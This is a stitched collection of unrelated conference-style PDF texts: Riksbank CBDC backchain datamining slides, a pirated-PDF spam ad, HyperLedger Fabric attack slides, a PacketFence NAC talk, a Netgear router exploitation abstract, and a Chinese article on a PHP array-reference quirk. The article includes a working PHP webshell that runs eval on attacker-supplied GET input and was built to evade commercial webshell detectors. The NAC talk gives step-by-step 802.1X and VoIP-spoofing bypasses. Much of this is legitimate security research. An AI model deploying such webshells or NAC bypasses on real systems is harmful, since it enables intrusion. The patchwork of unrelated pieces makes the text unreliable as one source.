amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
96
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
97
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
98
Practical example: Get the transactions
Admin of PSP2 has now extracted and created a JSON list of all transactions for all backchains for all
tokens on PSP2 Corda node.
{
"edges": [
{
"source": {"id": "PSP:GfHq2tTVk9z4eXgyKAMEqYfMYACZy4RQAuN3p72MxBywj86qJnnk3EhzaNPr", "label":
"PSP:GfHq2tTVk9z4eXgyKAMEqYfMYACZy4RQAuN3p72MxBywj86qJnnk3EhzaNPr"},
"target": {"id":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4", "label":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4"},
"value": "1337.30"
},
{
"source": {"id":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4", "label":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTKnaoNTewVAC9a27PCxXfDoS3pqhMa5duj6jJGEsqpvvtx59oNehuLxgXVWuaJ3oURRezoeTogZjBqpAPFXkmKnC4"},
"target": {"id":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTJX1eBDU2mve7qqDWbmoVu9HDG1pstQnSss4TsEC68tDuWKSRZ9hNJDrmcfkxZ4agpD7qM2UsvAGcPWwbG3qdAuts", "label":
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTJX1eBDU2mve7qqDWbmoVu9HDG1pstQnSss4TsEC68tDuWKSRZ9hNJDrmcfkxZ4agpD7qM2UsvAGcPWwbG3qdAuts"},
"value": "1337.40"
}]
}
99
Practical example: Datamine
Admin of PSP2 has the public keys of users in the backchain but can enrich the information
with wallet ID or alias with information in the logs or from user transaction log in the PSP2
business layer. To be able to do this any user on PSP2 must have done a transaction with
that public key earlier.
User history record extract from PSP2 business layer.
TxID
0DDB759E02091B3A52D61194AE7D464F7022DBF3DBAF45005B74F27F0E49A0B7
Command
PAY
Payer wallet ID
9021f73d-d883-4cfb-8899-203690bff93f
Payer PSP
PSP1
Payee wallet ID
cf960d62-b1a6-4816-8179-717808d160d8
Payee PSP
PSP2
Amount
5.00
100
Practical example: Visualize
Just pour the enriched JSON transaction list into HTML with D3.js (https://d3js.org/) function
d3.layout.force() to connect all the transactions.
<script>
d3.json("back2.json", function(error, data) {
...
var force = d3.layout.force();
...
graph = new myGraph();
graph.initialize();
</script>
101
Visualization with data only from PSP2
102
Backchain and privacy
Need to be compliant with:
• European General Data Protection Regulation (GDPR)
• Swedish bank secrecy regulation
103
Everything else
Everything that must be solved before going in production with a token based retail CBDC
• Performance and authenticity of the digital currency.
• High availability and in memory token selection.
• Catastrophic failures and disaster recovery.
• A secure offline?
• Non-repudiation.
• Information security (ISO 27000)
• IT security (NIST, OWASP)
• Laws, regulations and financial compliance
104
Solutions
There are many solutions for the presented challenges.
• Chain snipping, Chipping, Key rotation, Zero knowledge proof and other encryption.
• Validating notary node.
• Hardware wallets (e.g. smart cards).
• Restore procedures and functions for correcting inconsistencies.
The Riksbank is now experimenting with other designs and will also look at other
technologies.
105
Summary
The goal of this presentation is to share insights of the security challenges of building a
prototype of a two tier retail central bank digital currency based on a blockchain with value
based tokens.
Only presented threats, vulnerabilities, security fails and some unknowns.
Not presented the good design and all the positive lessons learned!
106
Thank you for
attending
107 | pdf |
本人可以提供各种PDF电子书资料,计算机类,文学,艺术,设计,医学,理
学,经济,金融,等等。质量都很清晰,而且每本100%都带书签和目录,方便
读者阅读观看,只要您提供给我书的相关信息,一般我都能找到,如果您有需
求,请联系我 QQ: 461573687, 或者 QQ: 2404062482。
本人已经帮助了上万人找到了他们需要的PDF,其实网上有很多PDF,大家如果
在网上不到的话,可以联系我QQ。因PDF电子书都有版权,请不要随意传播,
最近pdf也越来越难做了,希望大家尊重下个人劳动,谢谢!
__________________________________________________________________________________
提供各种书籍pdf下载,如有需要,请联系 QQ: 461573687
备用QQ:2404062482
PDF制作说明: | pdf |
Tineola: Taking A Bite Out of Enterprise Blockchain
Attacking HyperLedger Fabric
Parsia Hakimian, Stark Riedesel
Defcon 26 – Aug 11, 2018
© 2018 Synopsys, Inc.
2
5 Courses
Our Team
Enterprise Blockchains
A Use Case
The Target – HyperLedger Fabric
Tineola
© 2018 Synopsys, Inc.
3
HyperLedger Fabric – Core Research Group
Parsia Hakimian
Senior Consultant
Stark Riedesel
Senior Consultant
Travis Biehn
Emerging Tech Lead
Koen Buyens
Principal Consultant
© 2018 Synopsys, Inc.
4
Enterprise Blockchain Terroir
Enterprise Blockchain
Enthusiasts
Tech
Auto & Aero
Financial Services
Accounting
Healthcare
Logistics
Oil
Enterprise Platforms
Public Platforms
© 2018 Synopsys, Inc.
5
Platform Desires Meet Reality
Promise
Immutability
Auditability
Tune-able Trust
Programmable
Challenge
Immutability
Mutability
Privacy
Correctness and Speed
Execution Environment
Platform Complexity
© 2018 Synopsys, Inc.
6
On The Chopping Block
Enterprise Blockchain
Enthusiasts
Tech
Auto & Aero
Financial Services
Accounting
Healthcare
Logistics
Oil
Enterprise Platforms
Public Platforms
© 2018 Synopsys, Inc.
7
Build Blockchain Insurance App
Our Enterprise Application Strawman
© 2018 Synopsys, Inc.
8
Build Blockchain Insurance App
© 2018 Synopsys, Inc.
9
Build Blockchain Insurance App
© 2018 Synopsys, Inc.
10
Meet HyperLedger Fabric
An Interesting New Machine
© 2018 Synopsys, Inc.
11
Chaincode: Fabrics’ Smart Contracts
© 2018 Synopsys, Inc.
12
Security Model
© 2018 Synopsys, Inc.
13
HyperLedger Machine
© 2018 Synopsys, Inc.
14
HyperLedger Machine – Proposal
© 2018 Synopsys, Inc.
15
HyperLedger Machine – Concrete Execution
© 2018 Synopsys, Inc.
16
HyperLedger Machine – Endorsement
© 2018 Synopsys, Inc.
17
HyperLedger Machine – State Transition
© 2018 Synopsys, Inc.
18
HyperLedger Machine – New Global State
© 2018 Synopsys, Inc.
19
HyperLedger Machine – Suspect
Non BFT
Optional BFT
Caching
© 2018 Synopsys, Inc.
20
Tineola
“A Tool to Interface With HyperLedger Fabric”
© 2018 Synopsys, Inc.
21
Appetizers
© 2018 Synopsys, Inc.
22
Enumeration
© 2018 Synopsys, Inc.
23
Invoking Chaincode
© 2018 Synopsys, Inc.
24
Fuzzing
© 2018 Synopsys, Inc.
25
Simple Injection
© 2018 Synopsys, Inc.
26
Entrée
© 2018 Synopsys, Inc.
27
Pivoting
© 2018 Synopsys, Inc.
28
Direct DB Manipulation – Hierarchy Abuse
© 2018 Synopsys, Inc.
29
Pre-Commit Side Effects: Problems
© 2018 Synopsys, Inc.
30
Get Your Own Taste
Follow and PR: https://github.com/tineola/tineola
Thank You | pdf |
前言
继续分享一些 Webshell 的小tricks,在正文开始之前先留2个问题,可以先不看 pdf ,也不要把代码拿
去运行,用肉眼判断下面这2个 php 代码会输出什么,原理以及在 Webshell 中运用写在 PDF 里面了。
代码1:
代码2:
正文
这里应该也不用我揭晓答案了,拿去运行一下应该都一目了然了,上面提出的那2个代码均来自 php
bug ,我相信绝大部分人如果没遇到过此问题的话很有可能会判断错误。
判断错误的人想法可能如下:
问题一:为什么代码一中变量 $a 只是将值拷贝给 $c ,并没有进行引用传值,但是 $c[0]="c" 还是改
变了 $a[0] 。
问题二:为什么代码二中 theFunction 参数不是引用传参,但是在函数内部还是改变了全局变量
$array 的值
其实这个问题最早在20多年前就被开发者提出了: https://bugs.php.net/bug.php?id=6417 ,并且在后面
几年一直有开发者在 php-bug 和手册的 note 中提及:
https://bugs.php.net/bug.php?id=6417
https://bugs.php.net/bug.php?id=7412
https://bugs.php.net/bug.php?id=15025
https://bugs.php.net/bug.php?id=20993
https://www.php.net/manual/zh/language.references.php
<?php
$a=array("a","b");
$b=&$a[0];
$c=$a;
$c[0]="c";
$c[1]="d";
var_dump($a); //输出:?
?>
<?php
function theFunction($array) {
$array[0] = 2;
}
$array = array(1,2);
$reference =&$array[0];
theFunction($array);
var_dump($array); //输出:?
?>
直到 php8 该“问题”还是依旧存在,没有修复的原因是因为 PHP 官方不认为是一个 bug ,并给出的解释
是:
由于 PHP 内部工作的特殊性,如果对数组的单个元素进行引用,然后复制数组,无论是通过赋值还是通
过函数调用中的值传递,都会将引用复制为数组的一部分。这意味着对任一数组中任何此类元素的更改
都将在另一个数组(和其他引用中)中重复,即使数组具有不同的作用域(例如,一个是函数内部的参
数,另一个是全局的)!在复制时没有引用的元素,以及在复制数组后分配给其他元素的引用,将正常
工作(即独立于其他数组)。
为了验证上面的说法,我们这里 xdebug_debug_zval 查看变量 a 和 c 的信息,可以看到 $a[0] 和
$c[0] 被标为了 is_ref ,也就是说它们是一个引用类型
为了更严谨一点,这里通过 gdb 对 PHP 进行调试,可以看到gdb中 $a[0] 和 $c[0] 也是被标为了
is_ref 并且都指向同一内存地址,这也就验证了为什么修改 c[0] 也会导致 a[0] 改变。
在Webshell中的运用
既然我们已经知道 PHP 在数组引用中有这么一个“tricks”,那么能不能在 Webshell 中进行运用呢,答案
是可以的。
下面这个是我在阿里云比赛中提交的一个绕过样本,后续也测试了长亭牧云和百度的引擎,均能绕过。
<?php
$a=array(1 => "A");
$b=&$a[1];
$c=$a;
$c[$_GET["mem"]]=$_GET["cmd"];
eval($a[1]);
?>
如果 Webshell 引擎的开发没有对该“问题”进行适配的话,那么在后续的污点跟踪中会丢失相关的污
点,因为从 PHP 代码层面解析出来的抽象语法树上来看,变量 $c 只是对 $a 进行了一个值拷贝,所以
引擎自然而然地 $c 不会被标成污点。
思考
下面的代码又会输出什么呢?
https://bugs.php.net/bug.php?id=29992
参考
https://www.php.net/manual/zh/language.references.php
https://cloud.tencent.com/developer/article/1621153
https://bugs.php.net/bug.php?id=6417
https://bugs.php.net/bug.php?id=7412
https://bugs.php.net/bug.php?id=15025
https://bugs.php.net/bug.php?id=20993
https://bugs.php.net/bug.php?id=29992
<?php
$array = array(1,2,3);
foreach( $array as &$item ) { }
print_r( $array );
foreach( $array as $item ) { }
print_r( $array );
?> | pdf |
PacketFence, the Open Source NAC:
What we've done in the last two years
Salivating on NAC secret sauce
Presentation Plan
What's Network Access Control (NAC)
The secret sauce
The Open Source differentiator
The good and the bad of 2 years as lead developer
The Future of PacketFence (aka World Domination Roadmap)
Community bonding!
Who I am
Olivier Bilodeau
System architect working at Inverse inc
PacketFence lead developer since 2009
Teaching InfoSec to undergraduate in Montreal
...
new father, Open Source nuts, enjoying CTFs a lot, android developer, brewing beer
Social stuff
twitter: @packetfence / identi.ca: @plaxx
delicious: plaxxx / linkedin: olivier.bilodeau
What's Network Access Control (NAC)
NAC elevator pitch
NAC: Network Access (or Admission) Control
Authentication
Map usernames to IP addresses (or MAC addresses)
Admission
Allow, partially allow or deny users or devices
Control
Watch for unauthorized stuff
Including: Outdated AV, patch-level, scanning corporate servers, spreading
malware, ...
Know who is using your network and making sure they behave
What NAC has become
Remediation of users
Crush helpdesk costs by giving users their own path to fix their problems
Guest management
Asset/Inventory management
Simplified access layer configuration
Reduce network mgmt costs by centralizing decisions on a srv
The secret sauce
The technology
Mostly Perl some PHP
Leveraging open source*
Designed with high-availability in mind
active-passive clustering
Key design decisions
Out of band*
Edge enforcement*
No Agent
Web-based captive portal
Listen to everything
Out of band
At first, relying on SNMP Traps*
next slide is about that
LinkUp / LinkDown events
MAC Nofication events
Port-Security (SecurityViolation) events
Then RADIUS-based techniques emerged
Wireless MAC-Authentication*
Wireless 802.1X*
followed by Wired MAC-Auth and 802.1X
Edge enforcement: SNMP Traps based
Events on network hardware generates Traps
PacketFence reacts on the traps
Uses SNMP to authorize the MAC / change the VLAN
or telnet / ssh if the vendor sucks
port-sec traps have MACs in them so are best otherwise we need to poll
port-sec fail last-known state
Protocol Reminders
RADIUS
key-value based protocol for AAA
"infrastructure" protocol
Protocol Reminders (contd.)
802.1X
Extensible Authentication Protocol (EAP)
over RADIUS
Actors
Supplicant
client side software integrated in Win, Linux,
OSX now
Authenticator
aka NAS
Authentication Server
NAS is switch / controller, auth srv: FreeRADIUS on PF Server
explain typical dialog: client speaks to switch/controller with EAPoL (pre-access)
switch turns around and speak RADIUS with server
server reacts and send instructions to switch
end-to-end encrypted EAP tunnel is established
several EAP flavors things have mostly settled for PEAP/EAP-MsCHAPv2
switch doesn't have to understand EAP
Allows to securely share stuff with client (WPA-Enterprise keys)
Protocol Reminders (contd.)
MAC-Authentication
Simple RADIUS auth with MAC as User-Name
Concept similar to 802.1X
infra talks with srv, srv sends instructions
No strong authentication
trust based on MAC seen on the wire
No end-to-end with client
client doesn't need to "support it"
not sure what came up first but it feels like a backport of 802.1X
RADIUS CoA (RFC3576)
Server-initiated
Edge enforcement: RADIUS based
Access-Accept most request
Return proper VLAN attribute based on client status
FreeRADIUS does RADIUS / 802.1X pieces
full auth incl. NTLM (AD) trough samba
FreeRADIUS perl extension calls a PacketFence Web Server
Decision and VLAN returned at this point
H-A is critical as RADIUS is now a SPOF
The Captive Portal
It provides
Various authentication mechanism (LDAP, AD, RADIUS, Kerberos, Guests, ...)
Redirection to the Internet after authentication
Remediation information to users on isolated devices
The Captive Portal (contd.)
In order to reach the captive portal
Provide DHCP
IP to MAC (but we do arp also)
DNS Blackhole
In Registration / Isolation VLAN we are the DNS Server
No matter the request, we return PacketFence's IP
SSL Redirection
Requested URL is re-written to
http://www.google.com => https://pf.initech.com/captive-portal
WISPr support
Voice over IP
SNMP-based
Old way: Rely on CDP / Voice VLAN features
and allow dynamically learned MAC on Voice VLAN
That's right! No secret here, that's weak!
New way: handle them as regular devices
RADIUS-based
MAC-Auth
The switch is more important than your device
802.1X
Some VSA's to control behavior
Very few support 802.1X
Not widespread
Voice over IP (contd.)
Note to pentesters:
Most want auto-registration of phones
Accomplished through:
MAC Vendor prefix
CDP
DHCP fingerprints
802.1X MD5 Auth
Spoof: allowed on the Voice VLAN
if not worse
sometimes Voice VLANs IDs pushed down in DHCP Options!
Quarantine
On a separate VLAN providing
strong isolation
Triggers:
Operating System (based on DHCP
fingerprints)
I talked about those yesterday
(FingerBank talk)
Browsers (User-Agent string)
MAC Vendor
Nessus plugin ID (failed scan)*
IDS rule triggered*
Captive portal provides instructions
Remediation!
Policy checking and Monitoring
Nessus
Client-side scanning upon authentication
Somewhat limited
little use w/o domain credentials (scan open ports?)
not free
the more tests the slower
Snort IDS
Span your traffic to PacketFence server
available remote also
Enable some Snort rules
Devices violating the rules will be isolated
Network Hardware support
RADIUS-based is easiest
SNMP is challenging
Little standards (nothing regarding port-security)
Most implementation differ (even for the same vendor)
Nasty bugs*
PacketFence ZEN
ZEN: Zero Effort NAC
VMware Virtual Appliance
Pre-installed
Pre-configured
Open Source FTW!!
The open source advantage
Vendor independence
means we support more hardware brands
and today's networks are heterogeneous. Also no vendor locking
Proprietary pricing questionable
(per IP, per concurrent connections, per AP/Switch...)
We stay focused and build on top of
Usual daemons: Apache, Bind, dhcpd
Network services: Net-SNMP, FreeRADIUS
Security: snort, iptables
70+ Perl CPAN modules
Linux!
familiar stack
The technology is exposed: users know more and there's less reliance on vendors or
contractors
Security is necessarily not solely based on obscurity
Defeated proprietary NAC by hardcoding sniffed IP/gateway or pinning ARP
2 years as lead developer
The learning, the bad and the good.
IP Address spoofing
MAC Address spoofing
DHCP client spoofing
Use dhclient with a config file. Spoof VoIP, infrastructure devices to gain access. Could
work w/ PacketFence based on config. Well hidden secret though!
User-Agent spoofing
Spoof a mobile browser, bypass requirement for client Agent. That's how some of the
Learned: Most NACs are easy to
bypass
To achieve user friendliness or network administrator friendliness one often drops security
Per port exceptions (printers, voip, uplinks, etc.): Find them, leverage them
CDP enabled: Fake being an IP Phone or an infrastructure device
Real DNS exposed: DNS-tunnel out
Because there is no authentication built-in L2 / L3
big boys do it..
Learned: Wired 802.1X bypass
802.1X == Port-Based Network Access Control
1. Put a hub between victim and switch (prevent port from going down)
2. Wait for victim to successfully authenticate
3. Spoof your MAC with victim's MAC
4. Plug into the hub
Learned: Wired 802.1X bypass
Attack scenarios
1. We keep legitimate client connected
Bad: Duplicated MACs on the same segment
Good: Original client could re-authenticate if switch asks
2. Replace legitimate client
Bad: We won't pass a re-authentication request
Good: No network problems (no duplicated MAC on the segment)
Try it out. It works!
Learned: getting into 802.1X is tricky
business
Supplicant support
Win: Need to launch a service
OS EAP support varies
Proprietary supplicant quality / features varies
Some hardware begins to impement it
Forget about most of them
Too many things does IP: UPS, slingbox, barcode scanner
Outside the spec
Should a supplicant do DHCP REQUEST or DISCOVER after a new authentication?
How should a switch handle multiple supplicant per port?
Important for VoIP, Virtualization, etc.
Unified MAC-Auth + 802.1X configuration tricky
Timing issues on reboot (dot1x times out, MAC-Auth kicks in)
Learned: Wired 802.1X on Mac OSX is
buggy
After 802.1X re-authentication and a VLAN change (through RADIUS VLAN Attributes)
OSX does unicast DHCP REQUEST to its previous DHCP Server (instead of
DISCOVER)
Does 3 attempts with 1 minute delays between them
Then resort to a broadcasted DHCP DISCOVER
A "correct" implementation does
3 unicast DHCP REQUESTS in a row
Waits 2-3 seconds for replies
Then resort to a broadcasted DHCP DISCOVER
Noteworthy
They had the same issue on wireless but they fixed it in 10.6.5
We filed a bug report, provided requested information and haven't heard back since
Learned: Network vendor
fragmentation
VLAN assignment through SNMP
Port-Security
Named differently
Implemented differently (per VLAN, per port, per port-VLAN)
SNMP access inconsistent
RADIUS-based enforcement
Wired MAC-Authentication has many many names
MAC-Auth Bypass aka MAB (Cisco)
MAC-based authentication (HP)
NEAP (Nortel)
Netlogin (Extreme Networks)
MAC RADIUS (Juniper))
802.1X's grey areas are all implemented differently
RADIUS Change of Authorization (RFC3576) not so supported...
Newer stacks favor Web Services and only provide read-only SNMP
Fortunately the situation on the wireless side is better
Learned: Network vendors firmwares
quality
Regressions...
Weird coincidence? Same bugs implemented by different vendors
PacketFence: I think there's a bug here. Vendor: oh, right! it doesn't work using CLI
but it does work with the Web GUI
Scale issues
some implement the security table in MAC table. makes everything slower on large L2
VLANs
Learned/rant: Network vendor
closeness
I know some people aren't going to agree with this but...
All vendors hold tight on their issue trackers
Most vendors hold tight on their firmware
Some vendors hold tight on their documentation
Learned: Almost nobody does
infrastructure authentication
Asking a user to install/select a CA to authenticate the infrastructure is too much
Asking the admins to push a GPO with the proper configuration is too much
Isn't WPA2/Enterprise enough they say?
All the infrastructure to teach the user how to configure themselves can be sent over an
open SSID in HTTPS but even then they just don't care! They want youtube, now!
The bad
First installation step: Disable SELinux
Too short release cycles for a 'core infrastructure' piece of software
No nmap integration :(
External code contributors are scarce
Pretty much CentOS/RHEL only
The good: Development Process /
Infrastructure
Fully automated smoke tests
Automated nightly packages promoted to the website (snapshots)
Stable branches (2.2, trunk) vs feature branches
All the work is directly public. No internal magic or big code dumps.
The good: Usability++
Re-organized and simplified documentation
Simplified installation
Simplified upgrades
Default VLAN management technique covers a lot of use cases
The good: Enterprise++
Web Administration users rights
Out of the box support for routed environments
64 bit support
Fancy guest workflow support
Email activation
Hotel-style Access codes
Remote pre-registration
Approval by a sponsor
SMS authentication
...
The good: Performance++
1.8.5: ~10x MAC-Auth / 802.1X performance gain
1.9.0: Avoiding object re-creation and spawning shell commands (impact not
measured)
1.9.1: 23x faster captive portal
2.2.0: Automatic Apache number of child tweaking based on system memory
2.2.1: Reduced by 550% RADIUS round-trip time on environment with lots of network
devices
The good: Technology++
Web Services support for network hardware management
New architecture for RADIUS-based access using Web Services
Strongly decouples RADIUS from PacketFence infra
Allows tiered deployment: many local "dumb" FreeRADIUS boxes with a central PacketFence
server
Multi-site local RADIUS with caching in case of WAN failure
Demoed a PacketFence in the cloud on Amazon EC2 (Remote RADIUS, local
OpenVPN)
Making in-line and out-of-band work at the same time on the same server
Cool hacks: Proxy Bypass
Bypassing client-side proxy settings
The problem
Browser tries to reach the proxy
Proxy doesn't exist in registration / isolation VLANs
We rely on the browser to present information to the user
We rely on user IP to identify him
Worse, SSL through a proxy is done with a CONNECT end-to-end tunnel
The solution
A Squid proxy
Squid's URL Redirectors makes sure that all hits are redirected to the captive portal
Squid's SSL Bump will terminate CONNECT requests
No SSL errors since we bump using the real captive portal cert
and everything is still encrypted up to the PacketFence server
Cool hacks: Javascript network access
detection
The problem:
Enabling network access delay is unpredictable (OS, switch, browser, ...)
Avoid a fixed value otherwise everyone waits for slower
Browsers don't like changing IPs / DNS and still run javascript code
The solution:
Turn off DNS prefetching (with HTTP Header)
Hidden <img> tag with an onload callback
Periodically inject a src that points to an image hosted on a 'registered' VLAN
Once the image successfully load, the callback is called and we redirect the user to its original
destination
Our World Domination Roadmap
Short-term
In-line mode to ease support of legacy network hardware (now in beta!)
reduced complexity
RADIUS Accounting / Bandwidth monitoring
NAP / Statement of Health client-side checks
RADIUS CoA (RFC3576)
ACL / QoS assignment with RADIUS
VPN support
Debian / Ubuntu support
Long-term
Active-Active clustering support
nmap / OpenVAS integration
Making this stuff "Click Next-Next-Next" easy to install
Rewrite the Web Administration interface
would get rid of the php
Research topics
IF-MAP support
Open source multi-platform client-side agent
Trusted Computing Group's Trusted Network Connect (TNC)
Community bonding!
This is where we beg for help..
Network hardware vendors
Contact us we want to support your hardware!
Security software vendors
We want to integrate with your IDS, Netflow analyzer, IPS, Web filter, etc. but we need
licenses...
Developers
Low barrier to entry: It's all Perl!
Audit our [web] code. We know there are issues. Help us find and fix them!
Become users!
We would love to see more businesses/consultants deploying PacketFence for their
customers on their own!
That's it
I hope you enjoyed! See you in the debriefing room.
twitter: @packetfence / identi.ca: @plaxx
delicious: plaxxx / linkedin: olivier.bilodeau
References
PacketFence
Project Website, http://www.packetfence.org
Source Code Repository, http://mtn.inverse.ca
Issue tracker, http://www.packetfence.org/bugs
802.1X
Wikipedia: 802.1X, http://en.wikipedia.org/wiki/IEEE_802.1X
An Initial Security Analysis of the IEEE 802.1X Standard, http://www.cs.umd.edu/~waa/1x.pdf
Mitigating the Threats of Rogue Machines — 802.1X or IPsec?,
http://technet.microsoft.com/en-ca/library/cc512611.aspx
Research
Cisco NAC: No Agent for iOS,
http://www.cisco.com/en/US/docs/security/nac/appliance/support_guide/agntsprt.html#wp125743
Proxy Bypass
Feature ticket, http://www.packetfence.org/bugs/view.php?id=1035
Squid's SSL Bump, http://www.squid-cache.org/Doc/config/ssl_bump/
Squid's Redirectors, http://wiki.squid-cache.org/Features/Redirectors
Important projects
FreeRADIUS, http://freeradius.org/
Net-SNMP, http://www.net-snmp.org/
The others you already know about
Tools
yersinia: Comprehensive LAN attack tool, http://www.yersinia.net/
iodine: IP over DNS tunneling, http://code.kryo.se/iodine/ | pdf |
Teal Rogers and Alejandro Caceres
• Teal has experience with 3D
visualizations and organizing massive
amounts of data.
• Alex has a background in distributed
computing, network reconnaissance,
and vulnerability detection.
• The internet contains a massive amount of data that is
extremely interconnected, however we lack any good solutions
for visualizing these connections. Classical approaches to
showing that much data just don’t work. You either have to
eliminate too much data or else allow everything to become
too confusing.
• This is where 3D comes in. By organizing our data in 3D we
finally have a platform for displaying the invisible structure of
the web. Now that we finally have a way to structure the web
visually and intuitively, we can start adding data to that picture.
For instance by allowing everyone (everyone who uses our
software at least) to see just how many sites are riddled with
security vulnerabilities.
• I have been analyzing the security of sites on the internet
for some time now. Most websites on the Internet are a
complete mess. My PunkSPIDER project discovered this
when I unleashed my distributed fuzzer on the entire
Internet and started cataloging the results.
• The first thing we needed to do was what Google already did so
well -- collect links on the Internet and keep our index up to date.
One of our requirements was that this metadata include extensive
information on the vulnerabilities of a website. In order to find this,
we are performing thorough, but minimally invasive, application-
level vulnerability scanning against every site we crawl.
• We are leveraging the open-source and free Apache Nutch project
along with some custom built Nutch plugins to help us out with
this. Nutch is an extremely powerful Hadoop cluster-based
distributed web spider.
• We built a custom, distributed web application fuzzer to find
vulnerabilities as fast as we can spider. By using Alex’s experience
in building high-speed, distributed web app fuzzers (see
PunkSPIDER) we were able to build a custom one for this project
relatively quickly. Application vulnerability detection is an integral
part of the back-end workflow of this project and is in fact, built
directly into our web spidering efforts.
• The back-end’s goal is to make website security data an integral
part of high speed crawling, therefore allowing us to make this an
integral part of the visual metadata in the 3D engine.
• All of the structures you see here are organic. Pages repel each
other, links between pages pull them closer together, and every page
floats to its own level based on how many hops it is from the home
page. Using these basic physical principals each site creates its own
unique structure based on how its links are structured.
• This is just the beginning, we have a lot more to add to
our view of web 3.0, and we want your help. If you’re
interested, come to trinarysoftware.com or
hyperiongray.com, try the software for yourself, and add
yourself to the mailing list. We will be giving away free
beta access to everyone on the mailing list in a few
weeks, and we want your input on where you would like
to see web 3.0 go from here.
• If you want to hear more about Alex’s distributed network
reconnaissance and attack tools, he is giving a speech
about them in track 1 at 3:00 today. | pdf |
Abstract
This
paper
details
an
approach
by
which
SQL
injection
is
used
to
gain
remote
access
to
arbitrary
files
from
the
file
systems
of
Netgear
wireless
routers.
It
also
leverages
the
same
SQL
injection
to
exploit
a
buffer
overflow
in
the
Netgear
routers,
yielding
remote,
root-‐level
access.
It
guides
the
reader
from
start
to
finish
through
the
vulnerability
discovery
and
exploitation
process.
In
the
course
of
describing
several
vulnerabilities,
this
paper
presents
effective
investigation
and
exploitation
techniques
of
interest
to
those
analyzing
SOHO
routers
and
other
embedded
devices.
SQL Injection to MIPS Overflows:
Rooting SOHO Routers
